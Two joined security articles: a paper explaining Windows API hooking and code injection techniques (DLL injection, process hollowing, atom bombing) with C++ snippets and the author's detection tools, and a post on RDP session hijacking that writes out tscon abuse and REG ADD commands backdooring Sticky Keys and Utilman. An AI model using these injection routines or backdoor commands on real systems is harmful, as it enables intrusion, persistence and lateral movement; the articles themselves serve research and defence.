Userland API Monitoring and Code Injection Detection

( Original text by dtm )

bout This Paper

The following document is a result of self-research of malicious software (malware) and its interaction with the Windows Application Programming Interface (WinAPI). It details the fundamental concepts behind how malware is able to implant malicious payloads into other processes and how it is possible to detect such functionality by monitoring communication with the Windows operating system. The notion of observing calls to the API will also be illustrated by the procedure of hooking certain functions which will be used to achieve the code injection techniques.

Disclaimer: Since this was a relatively accelerated project due to some time constraints, I would like to kindly apologise in advance for any potential misinformation that may be presented and would like to ask that I be notified as soon as possible so that it may revised. On top of this, the accompanying code may be under-developed for practical purposes and have unforseen design flaws.


In the present day, malware are developed by cyber-criminals with the intent of compromising machines that may be leveraged to perform activities from which they can profit. For many of these activities, the malware must be able survive out in the wild, in the sense that they must operate covertly with all attempts to avert any attention from the victims of the infected and thwart detection by anti-virus software. Thus, the inception of stealth via code injection was the solution to this problem.

Section I: Fundamental Concepts

Inline Hooking

Inline hooking is the act of detouring the flow of code via hotpatching. Hotpatching is defined as the modification of code during the runtime of an executable image[1]. The purpose of inline hooking is to be able to capture the instance of when the program calls a function and then from there, observation and/or manipulation of the call can be accomplished. Here is a visual representation of how normal execution works:

Normal Execution of a Function Call

| Program | ------ calls function -----> | Function | (execution of function)

versus execution of a hooked function:

This can be separated into three steps. To demonstrate this process, the WinAPI function MessageBox 15 will be used.

  1. Hooking the function

To hook the function, we first require the intermediate function which must replicate parameters of the targetted function. Microsoft Developer Network (MSDN) defines MessageBox as the following:

int WINAPI MessageBox(
    _In_opt_ HWND    hWnd,
    _In_opt_ LPCTSTR lpText,
    _In_opt_ LPCTSTR lpCaption,
    _In_     UINT    uType

So the intermediate function may be defined like so:

int WINAPI HookedMessageBox(HWND hWnd, LPCTSTR lpText, LPCTSTR lpCaption, UINT uType) {
    // our code in here

Once this exists, execution flow has somewhere for the code to be redirected. To actually hook the MessageBoxfunction, the first few bytes of the code can be patched (keep in mind that the original bytes must be saved so that the function may be restored for when the intermediate function is finished). Here are the original assembly instructions of the function as represented in its corresponding module user32.dll:

; MessageBox
8B FF   mov edi, edi
55      push ebp
8B EC   mov ebp, esp

versus the hooked function:

; MessageBox
68 xx xx xx xx  push <HookedMessageBox> ; our intermediate function
C3              ret

Here I have opted to use the push-ret combination instead of an absolute jmp due to my past experiences of it not being reliable for reasons to be discovered. xx xx xx xx represents the little-endian byte-order address of HookedMessageBox.

  1. Capturing the function call

When the program calls MessageBox, it will execute the push-ret and effectively jump into the HookedMessageBox function and once there, it has complete control over the paramaters and the call itself. To replace the text that will be shown on the message box dialog, the following can be defined in HookedMessageBox:

int WINAPI HookedMessageBox(HWND hWnd, LPCTSTR lpText, LPCTSTR lpCaption, UINT uType) {
    TCHAR szMyText[] = TEXT("This function has been hooked!");

szMyText can be used to replace the LPCTSTR lpText parameter of MessageBox.

  1. Resuming normal execution

To forward this parameter, execution needs to continue to the original MessageBox so that the operating system can display the dialog. Since calling MessageBox again will just result in an infinite recursion, the original bytes must be restored (as previously mentioned).

int WINAPI HookedMessageBox(HWND hWnd, LPCTSTR lpText, LPCTSTR lpCaption, UINT uType) {
    TCHAR szMyText[] = TEXT("This function has been hooked!");
    // restore the original bytes of MessageBox
    // ...
    // continue to MessageBox with the replaced parameter and return the return value to the program
    return MessageBox(hWnd, szMyText, lpCaption, uType);

If rejecting the call to MessageBox was desired, it is as easy as returning a value, preferrably one that is defined in the documentation. For example, to return the “No” option from a “Yes/No” dialog, the intermediate function can be:

int WINAPI HookedMessageBox(HWND hWnd, LPCTSTR lpText, LPCTSTR lpCaption, UINT uType) {
    return IDNO;  // IDNO defined as 7

API Monitoring

The concept of API monitoring follows on from function hooking. Because gaining control of function calls is possible, observation of all of the parameters is also possible, as previously mentioned hence the name API monitoring. However, there is a small issue which is caused by the availability of different high-level API calls that are unique but operate using the same set of API at a lower level. This is called function wrapping, defined as subroutines whose purpose is to call a secondary subroutine. Returning to the MessageBox example, there are two defined functions: MessageBoxA for parameters that contain ASCII characters and a MessageBoxW for parameters that contain wide characters. In reality, to hook MessageBox, it is required that both MessageBoxAand MessageBoxW be patched. The solution to this problem is to hook at the lowest possible common point of the function call hierarchy.

                                                      | Program |
                                                     /           \
                                                    |             |
                                            +------------+   +------------+
                                            | Function A |   | Function B |
                                            +------------+   +------------+
                                                    |             |
                                           | user32.dll, kernel32.dll, ... |
       +---------+       +-------- hook -----------------> |
       |   API   | <---- +              +-------------------------------------+
       | Monitor | <-----+              |              ntdll.dll              |
       +---------+       |              +-------------------------------------+
                         +-------- hook -----------------> |                           User mode
                                                                                       Kernel mode

Here is what the MessageBox call hierarchy looks like:

Here is MessageBoxA:

user32!MessageBoxA -> user32!MessageBoxExA -> user32!MessageBoxTimeoutA -> user32!MessageBoxTimeoutW

and MessageBoxW:

user32!MessageBoxW -> user32!MessageBoxExW -> user32!MessageBoxTimeoutW

The call hierarchy both funnel into MessageBoxTimeoutW which is an appropriate location to hook. For functions that have a deeper hierarchy, hooking any lower could prove to be unecessarily troublesome due to the possibility of an increasing complexity of the function’s parameters. MessageBoxTimeoutW is an undocumented WinAPI function and is defined[2] like so:

int WINAPI MessageBoxTimeoutW(
    HWND hWnd, 
    LPCWSTR lpText, 
    LPCWSTR lpCaption, 
    UINT uType, 
    WORD wLanguageId, 
    DWORD dwMilliseconds

To log the usage:

int WINAPI MessageBoxTimeoutW(HWND hWnd, LPCWSTR lpText, LPCWSTR lpCaption, UINT uType, WORD wLanguageId, DWORD dwMilliseconds) {
    std::wofstream logfile;     // declare wide stream because of wide parameters"log.txt", std::ios::out | std::ios::app);
    logfile << L"Caption: " << lpCaption << L"\n";
    logfile << L"Text: " << lpText << L"\n";
    logfile << L"Type: " << uType << :"\n";
    // restore the original bytes
    // ...
    // pass execution to the normal function and save the return value
    int ret = MessageBoxTimeoutW(hWnd, lpText, lpCaption, uType, wLanguageId, dwMilliseconds);
    // rehook the function for next calls
    // ...
    return ret;   // return the value of the original function

Once the hook has been placed into MessageBoxTimeoutWMessageBoxA and MessageBoxW should both be captured.

Code Injection Primer

For the purposes of this paper, code injection will be defined as the insertion of executable code into an external process. The possibility of injecting code is a natural result of the functionality allowed by the WinAPI. If certain functions are stringed together, it is possible to access an existing process, write data to it and then execute it remotely under its context. In this section, the relevant techniques of code injection that was covered in the research will be introduced.

DLL Injection

Code can come from a variety of forms, one of which is a Dynamic Link Library (DLL). DLLs are libraries that are designed to offer extended functionality to an executable program which is made available by exporting subroutines. Here is an example DLL that will be used for the remainder of the paper:

extern "C" void __declspec(dllexport) Demo() {
    ::MessageBox(nullptr, TEXT("This is a demo!"), TEXT("Demo"), MB_OK);

bool APIENTRY DllMain(HINSTANCE hInstDll, DWORD fdwReason, LPVOID lpvReserved) {
    if (fdwReason == DLL_PROCESS_ATTACH)
        ::CreateThread(nullptr, 0, (LPTHREAD_START_ROUTINE)Demo, nullptr, 0, nullptr);
    return true;

When a DLL is loaded into a process and initialised, the loader will call DllMain with fdwReason set to DLL_PROCESS_ATTACH. For this example, when it is loaded into a process, it will thread the Demo subroutine to display a message box with the title Demo and the text This is a demo!. To correctly finish the initialisation of a DLL, it must return true or it will be unloaded.


DLL injection via the CreateRemoteThread 7 function utilises this function to execute a remote thread in the virtual space of another process. As mentioned above, all that is required to execute a DLL is to have it load into the process by forcing it to execute the LoadLibrary function. The following code can be used to accomplish this:

void injectDll(const HANDLE hProcess, const std::string dllPath) {
    LPVOID lpBaseAddress = ::VirtualAllocEx(hProcess, nullptr, dllPath.length(), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    ::WriteProcessMemory(hProcess, lpBaseAddress, dllPath.c_str(), dllPath.length(), &dwWritten);
    HMODULE hModule = ::GetModuleHandle(TEXT("kernel32.dll"));
    LPVOID lpStartAddress = ::GetProcAddress(hModule, "LoadLibraryA");      // LoadLibraryA for ASCII string
    ::CreateRemoteThread(hProcess, nullptr, 0, (LPTHREAD_START_ROUTINE)lpStartAddress, lpBaseAddress, 0, nullptr);

MSDN defines LoadLibrary as:

    _In_ LPCTSTR lpFileName

It takes a single parameter which is the path name to the desired library to load. The CreateRemoteThreadfunction allows one parameter to be passed into the thread routine which matches exactly that of LoadLibrary‘s function definition. The goal is to allocate the string parameter in the virtual address space of the target process and then pass that allocated space’s address into the parameter argument of CreateRemoteThread so that LoadLibrary can be invoked to load the DLL.

  1. Allocating virtual memory in the target process

Using VirtualAllocEx allows space to be allocated within a selected process and on success, it will return the starting address of the allocated memory.

Virtual Address Space of Target Process
                                              |                    |
                        VirtualAllocEx        +--------------------+
                        Allocated memory ---> |     Empty space    |
                                              |                    |
                                              |     Executable     |
                                              |       Image        |
                                              |                    |
                                              |                    |
                                              |    kernel32.dll    |
                                              |                    |
  1. Writing the DLL path to allocated memory

Once memory has been initialised, the path to the DLL can be injected into the allocated memory returned by VirtualAllocEx using WriteProcessMemory.

Virtual Address Space of Target Process
                                              |                    |
                        WriteProcessMemory    +--------------------+
                        Inject DLL path ----> | "..\..\myDll.dll"  |
                                              |                    |
                                              |     Executable     |
                                              |       Image        |
                                              |                    |
                                              |                    |
                                              |    kernel32.dll    |
                                              |                    |
  1. Get address of LoadLibrary

Since all system DLLs are mapped to the same address space across all processes, the address of LoadLibrary does not have to be directly retrieved from the target process. Simply calling GetModuleHandle(TEXT("kernel32.dll")) and GetProcAddress(hModule, "LoadLibraryA") will do the job.

  1. Loading the DLL

The address of LoadLibrary and the path to the DLL are the two main elements required to load the DLL. Using the CreateRemoteThread function, LoadLibrary is executed under the context of the target process with the DLL path as a parameter.

Virtual Address Space of Target Process
                                              |                    |
                                   +--------- | "..\..\myDll.dll"  |
                                   |          +--------------------+
                                   |          |                    |
                                   |          +--------------------+ <---+
                                   |          |     myDll.dll      |     |
                                   |          +--------------------+     |
                                   |          |                    |     | LoadLibrary
                                   |          +--------------------+     | loads
                                   |          |     Executable     |     | and
                                   |          |       Image        |     | initialises
                                   |          +--------------------+     | myDll.dll
                                   |          |                    |     |
                                   |          |                    |     |
          CreateRemoteThread       v          +--------------------+     |
          LoadLibraryA("..\..\myDll.dll") --> |    kernel32.dll    | ----+
                                              |                    |


Windows offers developers the ability to monitor certain events with the installation of hooks by using the SetWindowsHookEx 6 function. While this function is very common in the monitoring of keystrokes for keylogger functionality, it can also be used to inject DLLs. The following code demonstrates DLL injection into itself:

int main() {
    HMODULE hMod = ::LoadLibrary(DLL_PATH);
    HOOKPROC lpfn = (HOOKPROC)::GetProcAddress(hMod, "Demo");
    HHOOK hHook = ::SetWindowsHookEx(WH_GETMESSAGE, lpfn, hMod, ::GetCurrentThreadId());
    ::PostThreadMessageW(::GetCurrentThreadId(), WM_RBUTTONDOWN, (WPARAM)0, (LPARAM)0);

    // message queue to capture events
    MSG msg;
    while (::GetMessage(&msg, nullptr, 0, 0) > 0) {
    return 0;

SetWindowsHookEx defined by MSDN as:

HHOOK WINAPI SetWindowsHookEx(
    _In_ int       idHook,
    _In_ HOOKPROC  lpfn,
    _In_ HINSTANCE hMod,
    _In_ DWORD     dwThreadId

takes a HOOKPROC parameter which is a user-defined callback subroutine that is executed when the specific hook event is trigged. In this case, the event is WH_GETMESSAGE which deals with messages in the message queue. The code initially loads the DLL into its own virtual process space and the exported Demo function’s address is obtained and defined as the callback function in the call to SetWindowsHookEx. To force the callback function to execute, PostThreadMessage is called with the message WM_RBUTTONDOWN which will trigger the WH_GETMESSAGE hook and thus the message box will be displayed.


DLL injection with QueueUserAPC 5 works similar to that of CreateRemoteThread. Both allocate and inject the DLL path into the virtual address space of a target process and then force a call to LoadLibrary under its context.

int injectDll(const std::string dllPath, const DWORD dwProcessId, const DWORD dwThreadId) {
    HANDLE hProcess = ::OpenProcess(PROCESS_ALL_ACCESS, false, dwProcessId);

    HANDLE hThread = ::OpenThread(THREAD_ALL_ACCESS, false, dwThreadId);
    LPVOID lpLoadLibraryParam = ::VirtualAllocEx(hProcess, nullptr, dllPath.length(), MEM_COMMIT, PAGE_READWRITE);
    ::WriteProcessMemory(hProcess, lpLoadLibraryParam,, dllPath.length(), &dwWritten);
    ::QueueUserAPC((PAPCFUNC)::GetProcAddress(::GetModuleHandle(TEXT("kernel32.dll")), "LoadLibraryA"), hThread, (ULONG_PTR)lpLoadLibraryParam);
    return 0;

One major difference between this and CreateRemoteThread is that QueueUserAPC operates on alertable states. Asynchronous procedures queued by QueueUserAPC are only handled when a thread enters this state.

Process Hollowing

Process hollowing, AKA RunPE, is a popular method used to evade anti-virus detection. It allows the injection of entire executable files to be loaded into a target process and executed under its context. Often seen in crypted applications, a file on disk that is compatible with the payload is selected as the host and is created as a process, has its main executable module hollowed out and replaced. This procedure can be broken up into four stages.

  1. Creating a host process

In order for the payload to be injected, the bootstrap must first locate a suitable host. If the payload is a .NET application, the host must also be a .NET application. If the payload is a native executable defined to use the console subsystem, the host must also reflect the same attributes. The same is applied to x86 and x64 programs. Once the host has been chosen, it is created as a suspended process using CreateProcess(PATH_TO_HOST_EXE, ..., CREATE_SUSPENDED, ...).

Executable Image of Host Process
                                        +---  +--------------------+
                                        |     |         PE         |
                                        |     |       Headers      |
                                        |     +--------------------+
                                        |     |       .text        |
                                        |     +--------------------+
                          CreateProcess +     |       .data        |
                                        |     +--------------------+
                                        |     |         ...        |
                                        |     +--------------------+
                                        |     |         ...        |
                                        |     +--------------------+
                                        |     |         ...        |
                                        +---  +--------------------+
  1. Hollowing the host process

For the payload to work correctly after injection, it must be mapped to a virtual address space that matches its ImageBase value found in the optional header of the payload’s PE headers.

typedef struct _IMAGE_OPTIONAL_HEADER {
  WORD                 Magic;
  BYTE                 MajorLinkerVersion;
  BYTE                 MinorLinkerVersion;
  DWORD                SizeOfCode;
  DWORD                SizeOfInitializedData;
  DWORD                SizeOfUninitializedData;
  DWORD                AddressOfEntryPoint;          // <---- this is required later
  DWORD                BaseOfCode;
  DWORD                BaseOfData;
  DWORD                ImageBase;                    // <---- 
  DWORD                SectionAlignment;
  DWORD                FileAlignment;
  WORD                 MajorOperatingSystemVersion;
  WORD                 MinorOperatingSystemVersion;
  WORD                 MajorImageVersion;
  WORD                 MinorImageVersion;
  WORD                 MajorSubsystemVersion;
  WORD                 MinorSubsystemVersion;
  DWORD                Win32VersionValue;
  DWORD                SizeOfImage;                  // <---- size of the PE file as an image
  DWORD                SizeOfHeaders;
  DWORD                CheckSum;
  WORD                 Subsystem;
  WORD                 DllCharacteristics;
  DWORD                SizeOfStackReserve;
  DWORD                SizeOfStackCommit;
  DWORD                SizeOfHeapReserve;
  DWORD                SizeOfHeapCommit;
  DWORD                LoaderFlags;
  DWORD                NumberOfRvaAndSizes;

This is important because it is more than likely that absolute addresses are involved within the code which is entirely dependent on its location in memory. To safely map the executable image, the virtual memory space starting at the described ImageBase value must be unmapped. Since many executables share common base addresses (usually 0x400000), it is not uncommon to see the host process’s own executable image unmapped as a result. This is done with NtUnmapViewOfSection(IMAGE_BASE, SIZE_OF_IMAGE).

Executable Image of Host Process
                                        +---  +--------------------+
                                        |     |                    |
                                        |     |                    |
                                        |     |                    |
                                        |     |                    |
                                        |     |                    |
                   NtUnmapViewOfSection +     |                    |
                                        |     |                    |
                                        |     |                    |
                                        |     |                    |
                                        |     |                    |
                                        |     |                    |
                                        |     |                    |
                                        +---  +--------------------+
  1. Injecting the payload

To inject the payload, the PE file must be parsed manually to transform it from its disk form to its image form. After allocating virtual memory with VirtualAllocEx, the PE headers are directly copied to that base address.

Executable Image of Host Process
                                        +---  +--------------------+
                                        |     |         PE         |
                                        |     |       Headers      |
                                        +---  +--------------------+
                                        |     |                    |
                                        |     |                    |
                     WriteProcessMemory +     |                    |
                                              |                    |
                                              |                    |
                                              |                    |
                                              |                    |
                                              |                    |
                                              |                    |

To convert the PE file to an image, all of the sections must be individually read from their file offsets and then placed correctly into their correct virtual offsets using WriteProcessMemory. This is described in each of the sections’ own section header 1.

typedef struct _IMAGE_SECTION_HEADER {
  union {
    DWORD PhysicalAddress;
    DWORD VirtualSize;
  } Misc;
  DWORD VirtualAddress;               // <---- virtual offset
  DWORD SizeOfRawData;
  DWORD PointerToRawData;             // <---- file offset
  DWORD PointerToRelocations;
  DWORD PointerToLinenumbers;
  WORD  NumberOfRelocations;
  WORD  NumberOfLinenumbers;
  DWORD Characteristics;
Executable Image of Host Process
                                              |         PE         |
                                              |       Headers      |
                                        +---  +--------------------+
                                        |     |       .text        |
                                        +---  +--------------------+
                     WriteProcessMemory +     |       .data        |
                                        +---  +--------------------+
                                        |     |         ...        |
                                        +---- +--------------------+
                                        |     |         ...        |
                                        +---- +--------------------+
                                        |     |         ...        |
                                        +---- +--------------------+
  1. Execution of payload

The final step is to point the starting address of execution to the payload’s aforementioned AddressOfEntryPoint. Since the process’s main thread is suspended, using GetThreadContext to retrieve the relevant information. The context structure is defined as:

typedef struct _CONTEXT
     ULONG ContextFlags;
     ULONG Dr0;
     ULONG Dr1;
     ULONG Dr2;
     ULONG Dr3;
     ULONG Dr6;
     ULONG Dr7;
     ULONG SegGs;
     ULONG SegFs;
     ULONG SegEs;
     ULONG SegDs;
     ULONG Edi;
     ULONG Esi;
     ULONG Ebx;
     ULONG Edx;
     ULONG Ecx;
     ULONG Eax;                        // <----
     ULONG Ebp;
     ULONG Eip;
     ULONG SegCs;
     ULONG EFlags;
     ULONG Esp;
     ULONG SegSs;
     UCHAR ExtendedRegisters[512];

To modify the starting address, the Eax member must be changed to the virtual address of the payload’s AddressOfEntryPoint. Simply, context.Eax = ImageBase + AddressOfEntryPoint. To apply the changes to the process’s thread, calling SetThreadContext and passing in the modified CONTEXT struct is sufficient. All that is required now is to call ResumeThread and payload should start execution.

Atom Bombing

The Atom Bombing is a code injection technique that takes advantage of global data storage via Windows’s global atom table. The global atom table’s data is accessible across all processes which is what makes it a viable approach. The data stored in the table is a null-terminated C-string type and is represented with a 16-bit integer key called the atom, similar to that of a map data structure. To add data, MSDN provides a GlobalAddAtom 4 function and is defined as:

ATOM WINAPI GlobalAddAtom(
    _In_ LPCTSTR lpString

where lpString is the data to be stored. The 16-bit integer atom is returned on a successful call. To retrieve the data stored in the global atom table, MSDN provides a GlobalGetAtomName 2 defined as:

UINT WINAPI GlobalGetAtomName(
    _In_  ATOM   nAtom,
    _Out_ LPTSTR lpBuffer,
    _In_  int    nSize

Passing in the identifying atom returned from GlobalAddAtom will place the data into lpBuffer and return the length of the string excluding the null-terminator.

Atom bombing works by forcing the target process to load and execute code placed within the global atom table and this relies on one other crucial function, NtQueueApcThread, which is lowest level userland call for QueueUserAPC. The reason why NtQueueApcThread is used over QueueUserAPC is because, as seen before, QueueUserAPC‘s APCProc 1 only receives one parameter which is a parameter mismatch compared to GlobalGetAtomName[3].

VOID CALLBACK APCProc(               UINT WINAPI GlobalGetAtomName(
                                         _In_  ATOM   nAtom,
    _In_ ULONG_PTR dwParam     ->        _Out_ LPTSTR lpBuffer,
                                         _In_  int    nSize
);                                   );

However, the underlying implementation of NtQueueApcThread allows for three potential parameters:

NTSTATUS NTAPI NtQueueApcThread(                      UINT WINAPI GlobalGetAtomName(
    _In_     HANDLE           ThreadHandle,               // target process's thread
    _In_     PIO_APC_ROUTINE  ApcRoutine,                 // APCProc (GlobalGetAtomName)
    _In_opt_ PVOID            ApcRoutineContext,  ->      _In_  ATOM   nAtom,
    _In_opt_ PIO_STATUS_BLOCK ApcStatusBlock,             _Out_ LPTSTR lpBuffer,
    _In_opt_ ULONG            ApcReserved                 _In_  int    nSize
);                                                    );

Here is a visual representation of the code injection procedure:

Atom bombing code injection
                                              |                    |
                                              |      lpBuffer      | <-+
                                              |                    |   |
                                              +--------------------+   |
     +---------+                              |                    |   | Calls
     |  Atom   |                              +--------------------+   | GlobalGetAtomName
     | Bombing |                              |     Executable     |   | specifying
     | Process |                              |       Image        |   | arbitrary
     +---------+                              +--------------------+   | address space
          |                                   |                    |   | and loads shellcode
          |                                   |                    |   |
          |           NtQueueApcThread        +--------------------+   |
          +---------- GlobalGetAtomName ----> |      ntdll.dll     | --+
                                              |                    |

This is a very simplified overview of atom bombing but should be adequate for the remainder of the paper. For more information on atom bombing, please refer to enSilo’s AtomBombing: Brand New Code Injection for Windows 27.

Section II: UnRunPE

UnRunPE is a proof-of-concept (PoC) tool that was created for the purposes of applying API monitoring theory to practice. It aims to create a chosen executable file as a suspended process into which a DLL will be injected to hook specific functions utilised by the process hollowing technique.

Code Injection Detection

From the code injection primer, the process hollowing method was described with the following WinAPI call chain:

  1. CreateProcess
  2. NtUnmapViewOfSection
  3. VirtualAllocEx
  4. WriteProcessMemory
  5. GetThreadContext
  6. SetThreadContext
  7. ResumeThread

A few of these calls do not have to be in this specific order, for example, GetThreadContext can be called before VirtualAllocEx. However, the general arrangement cannot deviate much because of the reliance on former API calls, for example, SetThreadContext must be called before GetThreadContext or CreateProcess must be called first otherwise there will be no target process to inject the payload. The tool assumes this as a basis on which it will operate in an attempt to detect a potentially active process hollowing.

Following the theory of API monitoring, it is best to hook the lowest, common point but when it comes it malware, it should ideally be the lowest possible that is accessible. Assuming a worst case scenario, the author may attempt to skip the higher-level WinAPI functions and directly call the lowest function in the call hierarchy, usually found in the ntdll.dll module. The following WinAPI functions are the lowest in the call hierarchy for process hollowing:

  1. NtCreateUserProcess
  2. NtUnmapViewOfSection
  3. NtAllocateVirtualMemory
  4. NtWriteVirtualMemory
  5. NtGetContextThread
  6. NtSetContextThread
  7. NtResumeThread

Code Injection Dumping

Once the necessary functions are hooked, the target process is executed and each of the hooked functions’ parameters are logged to keep track of the current progress of the process hollowing and the host process. The most significant hooks are NtWriteVirtualMemory and NtResumeThread because the former applies the injection of the code and the latter executes it. Along with logging the parameters, UnRunPE will also attempt to dump the bytes written using NtWriteVirtualMemory and then when NtResumeThread is reached, it will attempt to dump the entire payload that has been injected into the host process. To achieve this, it uses the process and thread handle parameters logged in NtCreateUserProcess and the base address and size logged from NtUnmapViewOfSection. Using the parameters provided by NtAllocateVirtualMemory may be more appropriate however, due to some unknown reasons, hooking that function results in some runtime errors. When the payload has been dumped from NtResumeThread, it will terminate the target process and its host process to prevent execution of the injected code.

UnRunPE Demonstration

For the demonstration, I have chosen to use a trojanised binary that I had previously created as an experiment. It consists of the main executable PEview.exe and PuTTY.exe as the hidden executable.


Section III: Dreadnought

Dreadnought is a PoC tool that was built upon UnRunPE to support a wider variety of code injection detection, namely, those listed in Code Injection Primer. To engineer such an application, a few augmentations are required.

Detecting Code Injection Method

Because there are so many methods of code injection, differentiating each technique was a necessity. The first approach to this was to recognise a “trigger” API call, that is, the API call which would peform the remote execution of the payload. Using this would do two things: identify the completion of and, to an extent, the type of the code injection. The type can be categorised into four groups:

  • Section: Code injected as/into a section
  • Process: Code injected into a process
  • Code: Generic code injection or shellcode
  • DLL: Code injected as DLLs

Process Injection Info Graphic[4] by Karsten Hahn 2

Each trigger API is listed underneath Execute. When either of these APIs have been reached, Dreadought will perform a code dumping method that matches the assumed injection type in a similar fashion to what occurs with process hollowing in UnRunPE. Reliance on this is not enough because there is still potential for API calls to be mixed around to achieve the same functionality as displayed from the stemming of arrows.


For Dreadnought to be able to determine code injection methods more accurately, a heuristic should be involved as an assist. In the development, a very simplistic heuristic was applied. Following the process injection infographic, every time an API was hooked, it would increase the weight of one or more of the associated code injection types stored within a map data structure. As it traces each API call, it will start to favour a certain type. Once the trigger API has been entered, it will identify and compare the weights of the relevant types and proceed with an appropriate action.

Dreadnought Demonstration

Process Injection — Process Hollowing


DLL Injection — SetWindowsHookEx


DLL Injection — QueueUserAPC


Code Injection — Atom Bombing





This paper aimed to bring a technical understanding of code injection and its interaction with the WinAPI. Furthermore, the concept of API monitoring in userland was entertained with the malicious use of injection methods utilised by malware to bypass anti-virus detection. The following presents the current status of Dreadnought as of this writing.


Dreadnought’s current heuristic and detection design is incredibly poor but was sufficient enough for theoretical demonstration purposes. Practical use may not be ideal since there is a high possibility that there will be collateral with respect to the hooked API calls during regular operations with the operating system. Because of the impossibility to discern benign from malicious behaviour, false positives and negatives may arise as a result.

With regards to Dreadnought and its operations within userland, it may not be ideal use when dealing with sophisticated malware, especially those which have access to direct interactions with the kernel and those which have the capabilities to evade hooks in general.

PoC Repositories



RDP hijacking — how to hijack RDS and RemoteApp sessions transparently to move through an organisation

( Original text by Kevin Beaumont )

How you can very easily use Remote Desktop Services to gain lateral movement through a network, using no external software — and how to defend against it.

Alexander Korznikov demonstrates using Sticky Keys and tscon to access an administrator RDP session — without even logging into the server.

Brief background on RDP session connection

If you’ve used Remote Desktop Services before, or Terminal Services if you’re as old as me, you will know there’s a feature where you connect to another user’s session — if you know their password. Did you know you can also hijack a session without the user password? Read on.

You can right click a user in Task Manager, use tsadmin.msc, or use the command tscon.exe. It will ask for a password, and bomb if you can’t authenticate as the user:

Some tricks allow credential-less Session Hijacking

Here’s the deal. As revealed by by Benjamin Delpy (of Mimikatz) in 2011 and by Alexander Korznikov on Friday, if you run tscon.exe as the SYSTEM user, you can connect to any session without a password. It doesn’t prompt, it just connects you to the user’s desktop. I believe this is due to the way session shadowing was implemented in Microsoft Windows, and it runs throughout the years like this.

Now, you might be saying ‘If you’re SYSTEM, you’re already root… You can already do anything’.

Yes. Yes you can. You could, for example, dump out the server memory and get user passwords. That’s a long process compared to just running tscon.exe with a session number, and instantly get the desktop of said user — with no obvious trace, or external tools. This isn’t about SYSTEM — this is about what you can do with it very quickly, and quietly. Attackers aren’t interested in playing, they’re interested in what they can do with techniques. This is a very valid technique.

So, you have full blown RDP session hijacking, with a single command.

Some parameters about how far this reaches

  • You can connect to disconnected sessions. So if somebody logged out 3 days ago, you can just connect straight to their session and start using it.
  • It unlocks locked sessions. So if a user is away from their desk, you steal their session AND it unlocks the ‘workstation’ without needing any credentials.
  • It works for the physical console. So you can hijack the screen remotely. It also unlocks the physical console, too.
  • You can connect to ANY session — so if, for example, it’s the Helpdesk, you can connect to it without any authentication. If it’s a Domain Admin, you’re in. Because of the above point (you can connect to disconnected sessions), this makes it an incredibly simple way to laterally move through a network.
  • You can use win32k SYSTEM exploits — there are many — to gain SYSTEM permissions, and then use this feature. Meaning even as a standard user, if patches aren’t applied properly you can use this. Obviously, any route to SYSTEM is valid — e.g. any method to get to a local administrator (there’s a few!).
  • There are no external tools. Nothing to get through application whitelisting. No executable is written to disk.
  • Unless you know what to monitor (more on that later), you won’t know this is happening.
  • It works remotely. You can take over sessions on remote computers, even if you’re not logged into that server.

Gaining SYSTEM for tscon.exe

If you’re an administrator, you can use a service as Alexander demonstrates:

In essence it is really easy, just use the quser command to get the Session ID you want to hijack, and your own SESSIONNAME. Then run tscon with the Session ID for hijack, and your own SESSIONNAME. Your own Session will be replaced with the hijacked session. The service will run as SYSTEM by default — you’re in.

Just remember to delete the service afterwards, if you’re evil.

Here’s an example of it in practice on a Windows Server 2012 R2 server:

Other methods:

  • You can use Scheduled Tasks to gain SYSTEM and run the command. Just schedule the command to run immediately as SYSTEM with interactive privileges.
  • Use can use a variety of methods like Sticky Keys to get SYSTEM, without even needing to log in (in the future). See below.
  • Exploits etc (see above).

Lateral movement

Most organisations allow Remote Desktop through their internal network, because it’s 2017 and that’s how Windows administration works. Also, RemoteApp uses RDP. Because of this, it’s a fantastic way to move around an organisation’s network — forget passwords, just surf around and abuse other people’s access. You appear in the organisation logs as that user, not yourself.

How to backdoor for credential-less hijacking

Remote Desktop bruteforcing is a major problem. Anybody who has setup a honeypot recently will know within seconds you will be getting hit with failed RDP logins. First they portscan, then thousands of login attempts arrive.

It gets worse — I run RDP honeypots, and I see them regularly — when breached they get backdoored using the techniques below.

From research, over 1 in 200 scanned Remote Desktop servers online are already backdoored using these methods. This means that you can session hijack with them right now, without even needing to try to log in or authenticate in any way. That’s bad. Consider Shodan shows there are millions of RDP servers online right now, and the number grows constantly with cloud services etc, this is going to generate… issues.

RDP backdoor method one — Sticky Keys

The concept here is pretty simple — Windows supports a feature called Sticky Keys, which is an Accessibility feature built into the OS and available pre-logon (at the login screen, either via a physical console or via Remote Desktop). It runs as SYSTEM.

If you set Sethc.exe (Sticky Keys) to spawn cmd.exe, you have a backdoor you can use if you are locked out of a box — you have SYSTEM access, so you can do anything even without an account. You can do this by either replacing sethc.exe with cmd.exe — this requires a reboot, and physical access to the box — or just set the registry key using the command below.

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f

Ta-da! The box is now permanently backdoored. Just Remote Desktop in and at the login screen, hit F5 a bunch of times.

Method two — Utilman

It’s exactly the same as before, just trojan utilman.exe instead. At the login screen, press Windows Key+U, and you get a cmd.exe window as SYSTEM.

REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d “C:\windows\system32\cmd.exe” /f

Scanning for backdoor’d RDP servers

There is a prebuilt tool here, which works wonders — just spin it up and find servers which already have a SYSTEM level backdoor exposed:ztgrace/sticky_keys_hunter
sticky_keys_hunter — A script to test an RDP host for sticky keys and utilman

From online scanning, a significant amount of open RDP servers online are already backdoored.

Mimikatz module

There is now a Mimikatz module for very easily doing this:gentilkiwi/mimikatz
mimikatz — A little tool to play with Windows

gentilkiwi rocking it


OS-I had a section about Window Server 2016 here, however after further investigation it appears to also be impacted. After testing this applies to every OS since Windows 2000, including Windows 10 and 2016.

Group Policy — I strongly recommend you use Group Policy to log off disconnected sessions, either immediately or soon after the user disconnects. This will NOT be popular in IT environments — but the risk is now completely real that they can very easily — with one built in command — be hijacked more or less silently in the real world. I would also log off idle sessions.

